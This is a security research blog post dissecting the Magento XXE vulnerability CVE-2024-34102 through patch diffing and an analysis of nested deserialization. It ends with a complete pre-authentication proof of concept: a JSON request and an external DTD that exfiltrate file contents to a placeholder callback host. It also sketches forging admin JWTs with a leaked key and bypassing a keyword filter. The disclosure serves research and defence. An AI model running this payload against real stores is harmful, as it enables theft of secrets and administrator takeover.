June 26, 2024

Why nested deserialization is harmful: Magento XXE (CVE-2024-34102)

Magento is one of the most popular e-commerce solutions in use on the internet. It's estimated that there were over 140,000 instances of Magento running as of late 2023. Adobe's most recent advisory for Adobe Commerce / Magento, published on June 11th, 2024, highlighted a critical, pre-authentication XML external entity (XXE) injection issue (CVE-2024-34102), which Adobe rated as CVSS 9.8.

We were quite surprised that no public proof-of-concept existed when we read the advisory. Given the criticality of this issue, and to give customers of our Attack Surface Management Platform certainty about its exploitability, our security research team developed a proof-of-concept well before our customers could be exploited by malicious actors.

We believe that the vulnerability is severe for the following reasons:

- It is possible to exfiltrate the app/etc/env.php file from Magento, which contains a cryptographic key used to sign JWTs used for authentication. An attacker can craft an administrator JWT and abuse Magento's APIs as an admin user on affected installations.

- The vulnerability can be chained with recent research in PHP filter chains leading to RCE through the CVE-2024-2961 exploit, credit to Charles Fol.

- The broader impacts of XXE (any local file or remote URL's contents can be exfiltrated).
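
To make the first point concrete: with a symmetric signing scheme, whoever holds the key can mint tokens that the server will accept. The sketch below is a generic HS256 example built only on the Python standard library. The algorithm, the claim names and the key value are assumptions chosen for illustration; the source does not describe Magento's actual token format or how it derives the signing key from env.php.

```python
import base64
import hashlib
import hmac
import json


def b64url(raw: bytes) -> str:
    """Base64url-encode without padding, as compact JWTs require."""
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")


def sign_hs256(claims: dict, key: bytes) -> str:
    """Build a compact JWT over the claims, signed with HMAC-SHA256."""
    header = {"alg": "HS256", "typ": "JWT"}
    signing_input = ".".join(
        b64url(json.dumps(part, separators=(",", ":")).encode("utf-8"))
        for part in (header, claims)
    )
    mac = hmac.new(key, signing_input.encode("ascii"), hashlib.sha256).digest()
    return f"{signing_input}.{b64url(mac)}"


def verify_hs256(token: str, key: bytes) -> bool:
    """Recompute the MAC as a server would and compare in constant time."""
    signing_input, _, signature = token.rpartition(".")
    expected = hmac.new(key, signing_input.encode("ascii"), hashlib.sha256).digest()
    return hmac.compare_digest(b64url(expected), signature)


# Hypothetical key and claims, for illustration only.
leaked_key = b"key-read-from-env-php"
token = sign_hs256({"sub": "admin", "role": "administrator"}, leaked_key)

print(verify_hs256(token, leaked_key))         # True
print(verify_hs256(token, b"some-other-key"))  # False
```

The verifier cannot distinguish a token minted by the application from one minted by anyone else holding the same key, which is why rotating the key matters after a suspected file disclosure.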

We want to acknowledge Sergey Temnikov, who originally discovered this vulnerability, for his excellent work. Shortly after the vulnerability was dubbed "CosmicSting" by SanSec, he released a limited write-up, which discusses his methodology for discovering the issue but does not reveal the proof of concept. We highly recommend reading this write-up, as he explains Magento's internal deserialization process and its inherent dangers.

As we tracked the public knowledge of this vulnerability, we found that SanSec's original emergency mitigation could be bypassed, and Sergey's first iteration of the "fixed" mitigation could also be bypassed. This led to both SanSec and Sergey updating their emergency hotfix mitigations over time.

This was interesting to observe: it highlighted how important and effective peer review is for emergency hotfixes, and it is an argument for why disclosing the technical details of a vulnerability matters to the broader security industry.

To understand the key differences between an unpatched version of Magento and a patched one, we downloaded the packages magento2-2.4.7.zip (unpatched) and magento2-2.4.7-p1.zip (patched) from the Magento GitHub repository. Extracting these and then running DiffMerge on the two directories revealed a very important clue to discovering this vulnerability:

With the information that was publicly available, i.e., SanSec's first patch (blocking dataIsURL inside the POST body) as well as the diff we can see in the image above, it was clear to us that this vulnerability involved instantiating a SimpleXMLElement. PHP's documentation for this class revealed that dataIsURL is an argument that can be passed to the SimpleXMLElement constructor, which allows for loading XML from external sources.

The additional updates to the hotfix from Sergey revealed that you could not rely on blocking dataIsURL as the vulnerability was exploitable without this, and his mitigation focused on blocking the keyword sourceData.
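
The source does not say how the earlier mitigations were bypassed, so the following is only a general illustration of why keyword blocking on a raw request body is fragile. JSON allows any character in a key to be written as a \u escape, so a substring match on the raw bytes and a check on the decoded keys can disagree. The blocked key list and both filter functions are hypothetical and are not the actual hotfix logic.

```python
import json

# Hypothetical blocklist, compared case-insensitively.
BLOCKED_KEYS = {"sourcedata", "dataisurl"}


def naive_block(raw_body: str) -> bool:
    """Substring match on the raw request body."""
    lowered = raw_body.lower()
    return any(key in lowered for key in BLOCKED_KEYS)


def parsed_block(raw_body: str) -> bool:
    """Decode the JSON first, then inspect every key at every depth."""
    def walk(node) -> bool:
        if isinstance(node, dict):
            return any(
                str(key).lower() in BLOCKED_KEYS or walk(value)
                for key, value in node.items()
            )
        if isinstance(node, list):
            return any(walk(item) for item in node)
        return False

    try:
        return walk(json.loads(raw_body))
    except json.JSONDecodeError:
        return False  # not JSON; a real filter would handle this separately


plain = '{"address": {"sourceData": {"data": "x"}}}'
# Same key after JSON decoding, but the raw text contains a \u0061 escape.
escaped = '{"address": {"sourceD\\u0061ta": {"data": "x"}}}'

print(naive_block(plain), parsed_block(plain))      # True True
print(naive_block(escaped), parsed_block(escaped))  # False True
```

Inspecting the decoded structure is more robust than matching raw text, but any blocklist remains a stopgap until the vendor patch is applied.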

With all of this information, we spent most of our time setting up a development environment for Magento and then searching for a deserialization gadget that would lead us to the instantiation of a SimpleXMLElement with controllable arguments.

When it comes to complex deserialization issues, we highly suggest setting up a development environment with the ability to debug the code by setting breakpoints. For Magento 2, we utilized the following repo to bootstrap our development efforts. This docker image includes XDebug and is already configured for PhpStorm. After spinning up this docker image, we were able to install & seed Magento with sample data using the following commands:

./scripts/composer create-project --repository-url=https://repo.magento.com/ magento/project-community-edition=2.4.7 /home/magento # 2.4.7 is the vulnerable version
./scripts/magento setup:install --base-url=http://magento2.test/ --db-host=mysql --db-name=magento_db --db-user=magento_user --db-password="PASSWD#" --admin-firstname=admin --admin-lastname=admin --admin-email=admin@admin.test --admin-user=admin --admin-password=admin1! --language=en_US --currency=USD --timezone=America/Chicago --use-rewrites=1 --search-engine opensearch --opensearch-host=opensearch --opensearch-port=9200
./scripts/magento sampledata:deploy
./scripts/magento setup:upgrade

When searching through the Magento 2 code base for Simplexml\\Element.*sourceData, we identified the following locations that could be viable targets:

~/Downloads/magento2-2.4.7/app/code/Magento/Quote/Model/Quote/Address/Total/Collector.php:
   70       * @param \Magento\Store\Model\StoreManagerInterface $storeManager
   71       * @param \Magento\Quote\Model\Quote\Address\TotalFactory $totalFactory
   72:      * @param \Magento\Framework\Simplexml\Element|mixed $sourceData
   73       * @param mixed $store
   74       * @param SerializerInterface $serializer

~/Downloads/magento2-2.4.7/app/code/Magento/Sales/Model/Config/Ordered.php:
   84       * @param \Psr\Log\LoggerInterface $logger
   85       * @param \Magento\Sales\Model\Config $salesConfig
   86:      * @param \Magento\Framework\Simplexml\Element $sourceData
   87       * @param SerializerInterface $serializer
   88       */

~/Downloads/magento2-2.4.7/app/code/Magento/Sales/Model/Order/Total/Config/Base.php:
   44       * @param \Magento\Sales\Model\Config $salesConfig
   45       * @param \Magento\Sales\Model\Order\TotalFactory $orderTotalFactory
   46:      * @param \Magento\Framework\Simplexml\Element|mixed $sourceData
   47       * @param SerializerInterface $serializer
   48       */

~/Downloads/magento2-2.4.7/lib/internal/Magento/Framework/App/Config/Base.php:
   19  
   20      /**
   21:      * @param \Magento\Framework\Simplexml\Element|string $sourceData $sourceData
   22       */
   23      public function __construct($sourceData = null)

~/Downloads/magento2-2.4.7/lib/internal/Magento/Framework/App/Config/BaseFactory.php:
   26       * Create config model
   27       *
   28:      * @param string|\Magento\Framework\Simplexml\Element $sourceData
   29       * @return \Magento\Framework\App\Config\Base
   30       */

From this list, we believed the most likely candidate that could be reached without authentication would be Magento/Quote/Model/Quote/Address/Total/Collector.php. However, it was not obvious from reading the code alone how the nesting worked or how it allowed sourceData to be instantiated.
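
A search like the one that produced the listing above can be reproduced with any regex-capable tool. As a minimal sketch, the Python below walks a source tree and reports every PHP line matching the same pattern. The function name and the demo file are hypothetical; in practice the root would be the extracted magento2-2.4.7 directory.

```python
import re
import tempfile
from pathlib import Path

# Same pattern as in the text: a literal backslash between Simplexml and Element.
PATTERN = re.compile(r"Simplexml\\Element.*sourceData")


def find_candidates(root: Path):
    """Yield (path, line_number, line) for every PHP line matching PATTERN."""
    for path in sorted(root.rglob("*.php")):
        with path.open(encoding="utf-8", errors="replace") as handle:
            for number, line in enumerate(handle, start=1):
                if PATTERN.search(line):
                    yield path, number, line.strip()


# Self-contained demo on a throwaway file instead of a real Magento checkout.
with tempfile.TemporaryDirectory() as tmp:
    sample = Path(tmp) / "Base.php"
    sample.write_text(
        "<?php\n"
        "/**\n"
        " * @param \\Magento\\Framework\\Simplexml\\Element|string $sourceData\n"
        " */\n",
        encoding="utf-8",
    )
    hits = [(p.name, n, text) for p, n, text in find_candidates(Path(tmp))]

for name, number, text in hits:
    print(f"{name}:{number}: {text}")
```

Because the pattern targets docblock annotations, it only finds sinks that are documented this way; constructors without such a docblock would need a different search.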

To make further headway, it was necessary for us to understand at a high level how the input deserialization works. For that, we looked at magento2-2.4.7/lib/internal/Magento/Framework/Webapi/ServiceInputProcessor.php and its _createFromArray method:

        $data = is_array($data) ? $data : [];
        // convert to string directly to avoid situations when $className is object
        // which implements __toString method like \ReflectionObject
        $className = (string) $className;
        $class = new ClassReflection($className);
        if (is_subclass_of($className, self::EXTENSION_ATTRIBUTES_TYPE)) {
            $className = substr($className, 0, -strlen('Interface'));
        }

        // Primary method: assign to constructor parameters
        $constructorArgs = $this->getConstructorData($className, $data);
        $object = $this->objectManager->create($className, $constructorArgs);

        // Secondary method: fallback to setter methods
        foreach ($data as $propertyName => $value) {
            // ... SNIP ...

At a high level, if Magento is parsing some input data and expects a field address that contains a \Magento\Quote\Api\Data\Address, it does the following:

- First, if the fields of the JSON match any of the names of the variables in the constructor of the class, pass that field as an argument;

- Second, if the name doesn't match, instead look for a method on the class named set plus the field.

For example, if you passed the following JSON to the /rest/all/V1/guest-carts/test/estimate-shipping-methods endpoint:

{
    "address": {
        "data": [1, 2, 3],
        "BaseShippingAmount" : 123
    }
}

- The field data is in the constructor of the Address class as array $data = [], so it will be passed there.

- The Address class has a method setBaseShippingAmount, so after the class is instantiated it will call ->setBaseShippingAmount(123).
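
The matching rules above can be modelled in a few lines. The sketch below is a toy Python analogue, not Magento's implementation: fields that match a constructor parameter are passed to the constructor, remaining fields are routed to a set-prefixed method, and any constructor parameter typed as another class is built the same way from the nested input. The Address and Street classes here are simplified, hypothetical stand-ins.

```python
import inspect


class Street:
    def __init__(self, name: str = ""):
        self.name = name


class Address:
    def __init__(self, data: list = None, street: Street = None):
        self.data = data or []
        self.street = street
        self.base_shipping_amount = None

    def setBaseShippingAmount(self, amount):
        self.base_shipping_amount = amount


def is_model_class(annotation) -> bool:
    """True for user-defined classes, False for builtins or missing hints."""
    return (
        inspect.isclass(annotation)
        and annotation is not inspect.Parameter.empty
        and annotation.__module__ != "builtins"
    )


def create_from_dict(cls, payload: dict):
    params = inspect.signature(cls).parameters
    ctor_args, leftovers = {}, {}
    for field, value in payload.items():
        if field in params:
            annotation = params[field].annotation
            # Class-typed parameter: build it from the nested input as well.
            if is_model_class(annotation) and isinstance(value, dict):
                value = create_from_dict(annotation, value)
            ctor_args[field] = value
        else:
            leftovers[field] = value

    obj = cls(**ctor_args)  # primary: constructor parameters
    for field, value in leftovers.items():  # secondary: setter fallback
        setter = getattr(obj, "set" + field[:1].upper() + field[1:], None)
        if callable(setter):
            setter(value)
    return obj


address = create_from_dict(
    Address,
    {"data": [1, 2, 3], "BaseShippingAmount": 123, "street": {"name": "Main St"}},
)
print(address.data, address.base_shipping_amount, address.street.name)
# [1, 2, 3] 123 Main St
```

Note that the caller never named the Street class: the type hint alone decided what was instantiated, which is the property that makes this pattern risky when constructors have side effects.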

The danger comes from the fact that this is done recursively: if either the constructor or the setter takes a non-primitive type, such as another class, then the deserialization process is done recursively on that field. Looking at the constructor for the Address class, it has 37 parameters, and it's clear the Magento developers did not intend for you to be able to instantiate all of these:

    public function __construct(
        Context $context,
        Registry $registry,
        ExtensionAttributesFactory $extensionFactory,
        AttributeValueFactory $customAttributeFactory,
        Data $directoryData,
        \Magento\Eav\Model\Config $eavConfig,
        \Magento\Customer\Model\Address\Config $addressConfig,
        RegionFactory $regionFactory,
        CountryFactory $countryFactory,
        AddressMetadataInterface $metadataService,
        AddressInterfaceFactory $addressDataFactory,
        RegionInterfaceFactory $regionDataFactory,
        DataObjectHelper $dataObjectHelper,
        ScopeConfigInterface $scopeConfig,
        \Magento\Quote\Model\Quote\Address\ItemFactory $addressItemFactory,
        \Magento\Quote\Model\ResourceModel\Quote\Address\Item\CollectionFactory $itemCollectionFactory,
        RateFactory $addressRateFactory,
        RateCollectorInterfaceFactory $rateCollector,
        CollectionFactory $rateCollectionFactory,
        RateRequestFactory $rateRequestFactory,
        CollectorFactory $totalCollectorFactory,
        TotalFactory $addressTotalFactory,
        Copy $objectCopyService,
        CarrierFactoryInterface $carrierFactory,
        Address\Validator $validator,
        Mapper $addressMapper,
        Address\CustomAttributeListInterface $attributeList,
        TotalsCollector $totalsCollector,
        TotalsReader $totalsReader,
        AbstractResource $resource = null,
        AbstractDb $resourceCollection = null,
        array $data = [],
        Json $serializer = null,
        StoreManagerInterface $storeManager = null,
        ?CompositeValidator $compositeValidator = null,
        ?CountryModelsCache $countryModelsCache = null,
        ?RegionModelsCache $regionModelsCache = null,
    ) {

This provides a huge surface for bugs. By traversing chains of constructors and setters, it is possible to instantiate a wide variety of internal classes that were never meant to be user-facing. If any of those constructors or setters do dangerous things, as is the case with SimpleXMLElement, this can lead to a security vulnerability. Further details on how to map out the pre-authentication endpoints and corresponding models can be found in Sergey's write-up.
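
Finding such a chain is essentially a graph search: classes are nodes, and each class-typed constructor parameter is a labelled edge. The sketch below runs a breadth-first search over a small hand-written graph. The parameter names mirror the field names in the payload shown later in this post, but the class names and the graph itself are hypothetical simplifications, not data extracted from Magento.

```python
from collections import deque

# Hypothetical type graph: class -> {constructor parameter: parameter type}.
TYPE_GRAPH = {
    "Address": {"totalsReader": "TotalsReader", "validator": "Validator"},
    "TotalsReader": {"collectorList": "CollectorList"},
    "CollectorList": {"totalCollector": "Collector"},
    "Collector": {"sourceData": "SimplexmlElement"},
    "Validator": {},
}


def find_chain(graph, start, sink):
    """Return the shortest list of parameter names leading from start to sink."""
    queue = deque([(start, [])])
    seen = {start}
    while queue:
        type_name, path = queue.popleft()
        if type_name == sink:
            return path
        for param, param_type in graph.get(type_name, {}).items():
            if param_type not in seen:
                seen.add(param_type)
                queue.append((param_type, path + [param]))
    return None  # the sink is not reachable from this entry point


chain = find_chain(TYPE_GRAPH, "Address", "SimplexmlElement")
print(chain)
# ['totalsReader', 'collectorList', 'totalCollector', 'sourceData']
```

The same search run from the defender's side gives a way to audit which internal classes are reachable from each public entry point.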

The goal is now to find a chain of types in constructors that allows us to reach one of the Simplexml sinks identified earlier. Rather than trace the constructor manually for each class, we added the following line to magento2-2.4.7/lib/internal/Magento/Framework/Webapi/ServiceInputProcessor.php:

    private function getConstructorData(string $className, array $data): array
    {
        $preferenceClass = $this->config->getPreference($className);
        $class = new ClassReflection($preferenceClass ?: $className);

        try {
            $constructor = $class->getMethod('__construct');
        } catch (\ReflectionException $e) {
            $constructor = null;
        }

        if ($constructor === null) {
            return [];
        }

        $res = [];
        $parameters = $constructor->getParameters();
++      var_dump($parameters);

This simple var_dump helped us quickly understand all of the different parameters we could provide when calling the unauthenticated REST APIs, based on the magic deserialization logic that Magento had built.

By reading the names of the constructor parameters, we found that the pre-authentication endpoint /rest/all/V1/guest-carts/test/estimate-shipping-methods mentioned earlier was likely the best candidate for reaching sourceData.

Debugging the available parameters was made easier with our var_dump call, allowing us to quickly iterate on our payload with output as seen below:

  object(Laminas\Code\Reflection\ParameterReflection)#1176 (2) {
    ["name"]=>
    string(21) "totalCollectorFactory"
    ["isFromMethod":protected]=>
    bool(false)
  }
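
When a request produces many of these dumps, pulling out just the parameter names makes them easier to scan. The following is a small sketch that does this with a regular expression, assuming the var_dump format shown above; the function name is hypothetical.

```python
import re

# Matches: ["name"]=> <whitespace> string(N) "value"
NAME_RE = re.compile(r'\["name"\]=>\s*string\(\d+\)\s*"([^"]*)"')


def parameter_names(dump: str) -> list:
    """Return every reflected parameter name found in var_dump output."""
    return NAME_RE.findall(dump)


sample = r'''
  object(Laminas\Code\Reflection\ParameterReflection)#1176 (2) {
    ["name"]=>
    string(21) "totalCollectorFactory"
    ["isFromMethod":protected]=>
    bool(false)
  }
'''

print(parameter_names(sample))
# ['totalCollectorFactory']
```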

With further experimentation, we were able to develop the following payload, which instantiated a SimpleXMLElement with controllable arguments via the sourceData parameter:

POST /rest/all/V1/guest-carts/test-assetnote/estimate-shipping-methods HTTP/2
Host: example.com
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
Content-Type: application/json
Content-Length: 274

{
  "address": {
    "totalsReader": {
      "collectorList": {
        "totalCollector": {
          "sourceData": {
            "data": "<?xml version=\"1.0\" ?> <!DOCTYPE r [ <!ELEMENT r ANY > <!ENTITY % sp SYSTEM \"http://your_ip:9999/dtd.xml\"> %sp; %param1; ]> <r>&exfil;</r>",
            "options": 16
          }
        }
      }
    }
  }
}

With our DTD containing:

<!ENTITY % data SYSTEM "php://filter/convert.base64-encode/resource=/etc/hosts">
<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://collabid.oastify.com/dtd.xml?%data;'>">

This resulted in a request to our callback host carrying the base64-encoded contents of /etc/hosts in its query string.
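
Recovering the file on the listener side is then a matter of base64-decoding the query string of the callback request. A minimal sketch, assuming the request target has the form /dtd.xml?<base64> as the DTD above implies; the helper name and the sample file contents are hypothetical.

```python
import base64
from urllib.parse import unquote, urlsplit


def decode_exfil(request_target: str) -> str:
    """Decode the base64 blob carried in the query string of a callback."""
    query = unquote(urlsplit(request_target).query)
    # Restore padding in case the trailing '=' characters were dropped.
    query += "=" * (-len(query) % 4)
    return base64.b64decode(query).decode("utf-8", errors="replace")


# Simulate what a listener would see for a small hosts file.
sample_contents = "127.0.0.1 localhost\n"
target = "/dtd.xml?" + base64.b64encode(sample_contents.encode("utf-8")).decode("ascii")

print(decode_exfil(target))
```

The base64 filter is what makes this channel work for arbitrary files: without it, characters such as newlines or angle brackets in the file would break the URL or the entity declaration.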

Written by:

Adam Kues

Shubham Shah
